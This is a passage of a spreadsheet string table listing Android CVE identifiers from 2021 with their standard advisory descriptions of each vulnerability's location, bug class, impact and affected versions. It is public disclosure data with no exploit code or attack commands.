    <t>In onActivityResult of QuickContactActivity.java, there is an unnecessary return of an intent. This could lead to local information disclosure of contact data with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-178825358</t>
  </si>
  <si>
    <t>CVE-2021-0445</t>
  </si>
  <si>
    <t>In start of WelcomeActivity.java, there is a possible residual profile due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9Android ID: A-172322502</t>
  </si>
  <si>
    <t>CVE-2021-0446</t>
  </si>
  <si>
    <t>In ImportVCardActivity, there is a possible way to bypass user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-172252122</t>
  </si>
  <si>
    <t>CVE-2021-0449</t>
  </si>
  <si>
    <t>In the Titan M chip firmware, there is a possible disclosure of stack memory due to uninitialized data. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-175117965</t>
  </si>
  <si>
    <t>CVE-2021-0450</t>
  </si>
  <si>
    <t>In the Titan M chip firmware, there is a possible disclosure of stack memory due to uninitialized data. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-175117880</t>
  </si>
  <si>
    <t>CVE-2021-0451</t>
  </si>
  <si>
    <t>In the Titan M chip firmware, there is a possible disclosure of stack memory due to uninitialized data. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-175117871</t>
  </si>
  <si>
    <t>CVE-2021-0452</t>
  </si>
  <si>
    <t>In the Titan M chip firmware, there is a possible disclosure of stack memory due to uninitialized data. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-175117261</t>
  </si>
  <si>
    <t>CVE-2021-0453</t>
  </si>
  <si>
    <t>In the Titan-M chip firmware, there is a possible disclosure of stack memory due to uninitialized data. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-175117199</t>
  </si>
  <si>
    <t>CVE-2021-0454</t>
  </si>
  <si>
    <t>In the Citadel chip firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-175117047</t>
  </si>
  <si>
    <t>CVE-2021-0455</t>
  </si>
  <si>
    <t>In the Citadel chip firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-175116439</t>
  </si>
  <si>
    <t>CVE-2021-0456</t>
  </si>
  <si>
    <t>In the Citadel chip firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-174769927</t>
  </si>
  <si>
    <t>CVE-2021-0457</t>
  </si>
  <si>
    <t>In the FingerTipS touch screen driver, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-157155375</t>
  </si>
  <si>
    <t>CVE-2021-0458</t>
  </si>
  <si>
    <t>In the FingerTipS touch screen driver, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-157156744</t>
  </si>
  <si>
    <t>CVE-2021-0459</t>
  </si>
  <si>
    <t>In fts_driver_test_write of fts_proc.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-157154534</t>
  </si>
  <si>
    <t>CVE-2021-0460</t>
  </si>
  <si>
    <t>In the FingerTipS touch screen driver, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-156739245</t>
  </si>
  <si>
    <t>CVE-2021-0461</t>
  </si>
  <si>
    <t>In iaxxx_core_sensor_change_state of iaxxx-module.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-175124074</t>
  </si>
  <si>
    <t>CVE-2021-0462</t>
  </si>
  <si>
    <t>In the NXP NFC firmware, there is a possible insecure firmware update due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168799695</t>
  </si>
  <si>
    <t>CVE-2021-0463</t>
  </si>
  <si>
    <t>In convertToHidl of convert.cpp, there is a possible out of bounds read due to uninitialized data from ReturnFrameworkMessage. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-154867068</t>
  </si>
  <si>
    <t>CVE-2021-0464</t>
  </si>
  <si>
    <t>In sound_trigger_event_alloc of platform.h, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-167663878</t>
  </si>
  <si>
    <t>CVE-2021-0465</t>
  </si>
  <si>
    <t>In GenerateFaceMask of face.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-172005755</t>
  </si>
  <si>
    <t>CVE-2021-0466</t>
  </si>
  <si>
    <t>In startIpClient of ClientModeImpl.java, there is a possible identifier which could be used to track a device. This could lead to remote information disclosure to a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-154114734</t>
  </si>
  <si>
    <t>CVE-2021-0467</t>
  </si>
  <si>
    <t>In Chromecast bootROM, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege in the bootloader, with physical USB access, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-174490700</t>
  </si>
  <si>
    <t>CVE-2021-0468</t>
  </si>
  <si>
    <t>In LK, there is a possible escalation of privilege due to an insecure default value. This could lead to local escalation of privilege for an attacker who has physical access to the device with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-180427272</t>
  </si>
  <si>
    <t>CVE-2021-0471</t>
  </si>
  <si>
    <t>In decrypt_1_2 of CryptoPlugin.cpp, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444786</t>
  </si>
  <si>
    <t>CVE-2021-0472</t>
  </si>
  <si>
    <t>In shouldLockKeyguard of LockTaskController.java, there is a possible way to exit App Pinning without a PIN due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-176801033</t>
  </si>
  <si>
    <t>CVE-2021-0473</t>
  </si>
  <si>
    <t>In rw_t3t_process_error of rw_t3t.cc, there is a possible double free due to uninitialized data. This could lead to remote code execution over NFC with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-179687208</t>
  </si>
  <si>
    <t>CVE-2021-0474</t>
  </si>
  <si>
    <t>In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-177611958</t>
  </si>
  <si>
    <t>CVE-2021-0475</t>
  </si>
  <si>
    <t>In on_l2cap_data_ind of btif_sock_l2cap.cc, there is possible memory corruption due to a use after free. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-175686168</t>
  </si>
  <si>
    <t>CVE-2021-0476</t>
  </si>
  <si>
    <t>In FindOrCreatePeer of btif_av.cc, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-169252501</t>
  </si>
  <si>
    <t>CVE-2021-0477</t>
  </si>
  <si>
    <t>In notifyScreenshotError of ScreenshotNotificationsController.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-178189250</t>
  </si>
  <si>
    <t>CVE-2021-0478</t>
  </si>
  <si>
    <t>In updateDrawable of StatusBarIconView.java, there is a possible permission bypass due to an uncaught exception. This could lead to local escalation of privilege by running foreground services without notifying the user, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-169255797</t>
  </si>
  <si>
    <t>CVE-2021-0480</t>
  </si>
  <si>
    <t>In createPendingIntent of SnoozeHelper.java, there is a possible broadcast intent containing a sensitive identifier. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-174493336</t>
  </si>
  <si>
    <t>CVE-2021-0481</t>
  </si>
  <si>
    <t>In onActivityResult of EditUserPhotoController.java, there is a possible access of unauthorized files due to an unexpected URI handler. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-172939189</t>
  </si>
  <si>
    <t>CVE-2021-0482</t>
  </si>
  <si>
    <t>In BinderDiedCallback of MediaCodec.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-173791720</t>
  </si>
  <si>
    <t>CVE-2021-0483</t>
  </si>
  <si>
    <t>In multiple methods of AAudioService, there is a possible use-after-free due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-153358911</t>
  </si>
  <si>
    <t>CVE-2021-0484</t>
  </si>
  <si>
    <t>In readVector of IMediaPlayer.cpp, there is a possible read of uninitialized heap data due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-173720767</t>
  </si>
  <si>
    <t>CVE-2021-0485</t>
  </si>
  <si>
    <t>In getMinimalSize of PipBoundsAlgorithm.java, there is a possible bypass of restrictions on background processes due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174302616</t>
  </si>
  <si>
    <t>CVE-2021-0486</t>
  </si>
  <si>
    <t>In onPackageAddedInternal of PermissionManagerService.java, there is possible access to external storage due to a permissions bypass. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-171430330</t>
  </si>
  <si>
    <t>CVE-2021-0487</t>
  </si>
  <si>
    <t>In onCreate of CalendarDebugActivity.java, there is a possible way to export calendar data to the sdcard without user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174046397</t>
  </si>
  <si>
    <t>CVE-2021-0488</t>
  </si>
  <si>
    <t>In pb_write of pb_encode.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-178754781</t>
  </si>
  <si>
    <t>CVE-2021-0489</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183464866</t>
  </si>
  <si>
    <t>CVE-2021-0490</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183464868</t>
  </si>
  <si>
    <t>CVE-2021-0491</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183461315</t>
  </si>
  <si>
    <t>CVE-2021-0492</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183459078</t>
  </si>
  <si>
    <t>CVE-2021-0493</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183461317</t>
  </si>
  <si>
    <t>CVE-2021-0494</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183461318</t>
  </si>
  <si>
    <t>CVE-2021-0495</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183459083</t>
  </si>
  <si>
    <t>CVE-2021-0496</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183467912</t>
  </si>
  <si>
    <t>CVE-2021-0497</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183461320</t>
  </si>
  <si>
    <t>CVE-2021-0498</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183461321</t>
  </si>
  <si>
    <t>CVE-2021-0504</t>
  </si>
  <si>
    <t>In avrc_pars_browse_rsp of avrc_pars_ct.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179162665</t>
  </si>
  <si>
    <t>CVE-2021-0505</t>
  </si>
  <si>
    <t>In the Settings app, there is a possible way to disable an always-on VPN due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179975048</t>
  </si>
  <si>
    <t>CVE-2021-0506</t>
  </si>
  <si>
    <t>In ActivityPicker.java, there is a possible bypass of user interaction in intent resolution due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-181962311</t>
  </si>
  <si>
    <t>CVE-2021-0507</t>
  </si>
  <si>
    <t>In handle_rc_metamsg_cmd of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181860042</t>
  </si>
  <si>
    <t>CVE-2021-0508</t>
  </si>
  <si>
    <t>In various functions of DrmPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-176444154</t>
  </si>
  <si>
    <t>CVE-2021-0509</t>
  </si>
  <si>
    <t>In various functions of CryptoPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444161</t>
  </si>
  <si>
    <t>CVE-2021-0510</t>
  </si>
  <si>
    <t>In decrypt_1_2 of CryptoPlugin.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444622</t>
  </si>
  <si>
    <t>CVE-2021-0511</t>
  </si>
  <si>
    <t>In Dex2oat of dex2oat.cc, there is a possible way to inject bytecode into an app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-178055795</t>
  </si>
  <si>
    <t>CVE-2021-0512</t>
  </si>
  <si>
    <t>In __hidinput_change_resolution_multipliers of hid-input.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-173843328References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0513</t>
  </si>
  <si>
    <t>In deleteNotificationChannel and related functions of NotificationManagerService.java, there is a possible permission bypass due to improper state validation. This could lead to local escalation of privilege via hidden services with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-156090809</t>
  </si>
  <si>
    <t>CVE-2021-0514</t>
  </si>
  <si>
    <t>In several functions of the V8 library, there is a possible use after free due to a race condition. This could lead to remote code execution in an unprivileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-9 Android-11 Android-8.1Android ID: A-162604069</t>
  </si>
  <si>
    <t>CVE-2021-0515</t>
  </si>
  <si>
    <t>In Factory::CreateStrictFunctionMap of factory.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution in an unprivileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-167389063</t>
  </si>
  <si>
    <t>CVE-2021-0516</t>
  </si>
  <si>
    <t>In p2p_process_prov_disc_req of p2p_pd.c, there is a possible out of bounds read and write due to a use after free. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181660448</t>
  </si>
  <si>
    <t>CVE-2021-0517</t>
  </si>
  <si>
    <t>In updateCapabilities of ConnectivityService.java, there is a possible incorrect network state determination due to a logic error in the code. This could lead to biasing of networking tasks to occur on non-VPN networks, which could lead to remote information disclosure, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179053823</t>
  </si>
  <si>
    <t>CVE-2021-0518</t>
  </si>
  <si>
    <t>In Wi-Fi, there is a possible leak of location-sensitive data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-176541017</t>
  </si>
  <si>
    <t>CVE-2021-0519</t>
  </si>
  <si>
    <t>In BITSTREAM_FLUSH of ih264e_bitstream.h, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-176533109</t>
  </si>
  <si>
    <t>CVE-2021-0520</t>
  </si>
  <si>
    <t>In several functions of MemoryFileSystem.cpp and related files, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-176237595</t>
  </si>
  <si>
    <t>CVE-2021-0521</t>
  </si>
  <si>
    <t>In getAllPackages of PackageManagerService, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure of cross-user permissions with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174661955</t>
  </si>
  <si>
    <t>CVE-2021-0522</t>
  </si>
  <si>
    <t>In ConnectionHandler::SdpCb of connection_handler.cc, there is a possible out of bounds read due to a use after free. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-174182139</t>
  </si>
  <si>
    <t>CVE-2021-0523</t>
  </si>
  <si>
    <t>In onCreate of WifiScanModeActivity.java, there is a possible way to enable Wi-Fi scanning without user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-174047492</t>
  </si>
  <si>
    <t>CVE-2021-0524</t>
  </si>
  <si>
    <t>In isServiceDistractionOptimized of CarPackageManagerService.java, there is a possible disclosure of installed packages due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-180418334</t>
  </si>
  <si>
    <t>CVE-2021-0525</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185193929</t>
  </si>
  <si>
    <t>CVE-2021-0526</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185195264</t>
  </si>
  <si>
    <t>CVE-2021-0527</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185193931</t>
  </si>
  <si>
    <t>CVE-2021-0528</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185195266</t>
  </si>
  <si>
    <t>CVE-2021-0529</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible memory corruption due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185195268</t>
  </si>
  <si>
    <t>CVE-2021-0530</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185196175</t>
  </si>
  <si>
    <t>CVE-2021-0531</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185195272</t>
  </si>
  <si>
    <t>CVE-2021-0532</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185196177</t>
  </si>
  <si>
    <t>CVE-2021-0533</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185193932</t>
  </si>
  <si>
    <t>CVE-2021-0534</t>
  </si>
  <si>
    <t>In permission declarations of DeviceAdminReceiver.java, there is a possible lack of broadcast protection due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-170639543</t>
  </si>
  <si>
    <t>CVE-2021-0535</t>
  </si>
  <si>
    <t>In wpas_ctrl_msg_queue_timeout of ctrl_iface_unix.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-168314741</t>
  </si>
  <si>
    <t>CVE-2021-0536</t>
  </si>
  <si>
    <t>In dropFile of WiFiInstaller, there is a way to delete files accessible to CertInstaller due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-176756691</t>
  </si>
  <si>
    <t>CVE-2021-0537</t>
  </si>
  <si>
    <t>In onCreate of WiFiInstaller.java, there is a possible way to install a malicious Hotspot 2.0 configuration due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-176756141</t>
  </si>
  <si>
    <t>CVE-2021-0538</t>
  </si>
  <si>
    <t>In onCreate of EmergencyCallbackModeExitDialog.java, there is a possible exit of emergency callback mode due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-178821491</t>
  </si>
  <si>
    <t>CVE-2021-0539</t>
  </si>
  <si>
    <t>In archiveStoredConversation of MmsService.java, there is a possible way to archive message conversation without user consent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-180419673</t>
  </si>
  <si>
    <t>CVE-2021-0540</t>
  </si>
  <si>
    <t>In halWrapperDataCallback of hal_wrapper.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169328517</t>
  </si>
  <si>
    <t>CVE-2021-0541</t>
  </si>
  <si>
    <t>In phNxpNciHal_ext_process_nfc_init_rsp of phNxpNciHal_ext.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure in the NFC server with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169258455</t>
  </si>
  <si>
    <t>CVE-2021-0542</t>
  </si>
  <si>
    <t>In updateNotification of BeamTransferManager.java, there is a missing permission check. This could lead to local information disclosure of paired Bluetooth addresses with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-168712890</t>
  </si>
  <si>
    <t>CVE-2021-0543</t>
  </si>
  <si>
    <t>In phNxpNciHal_process_ext_rsp of phNxpNciHal_ext.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169258743</t>
  </si>
  <si>
    <t>CVE-2021-0544</t>
  </si>
  <si>
    <t>In phNxpNciHal_print_res_status of phNxpNciHal.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169257710</t>
  </si>
  <si>
    <t>CVE-2021-0545</t>
  </si>
  <si>
    <t>In phNxpNciHal_print_res_status of phNxpNciHal.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the NFC server with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169258884</t>
  </si>
  <si>
    <t>CVE-2021-0546</t>
  </si>
  <si>
    <t>In phNxpNciHal_print_res_status of phNxpNciHal.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169258733</t>
  </si>
  <si>
    <t>CVE-2021-0547</t>
  </si>
  <si>
    <t>In onReceive of NetInitiatedActivity.java, there is a possible way to supply an attacker-controlled value to a GPS HAL handler due to a missing permission check. This could lead to local escalation of privilege that may result in undefined behavior in some HAL implementations with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174151048</t>
  </si>
  <si>
    <t>CVE-2021-0548</t>
  </si>
  <si>
    <t>In rw_i93_send_to_lower of rw_i93.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-157650357</t>
  </si>
  <si>
    <t>CVE-2021-0549</t>
  </si>
  <si>
    <t>In sspRequestCallback of BondStateMachine.java, there is a possible leak of Bluetooth MAC addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-183961896</t>
  </si>
  <si>
    <t>CVE-2021-0550</t>
  </si>
  <si>
    <t>In onLoadFailed of AnnotateActivity.java, there is a possible way to gain WRITE_EXTERNAL_STORAGE permissions without user consent due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179688673</t>
  </si>
  <si>
    <t>CVE-2021-0551</t>
  </si>
  <si>
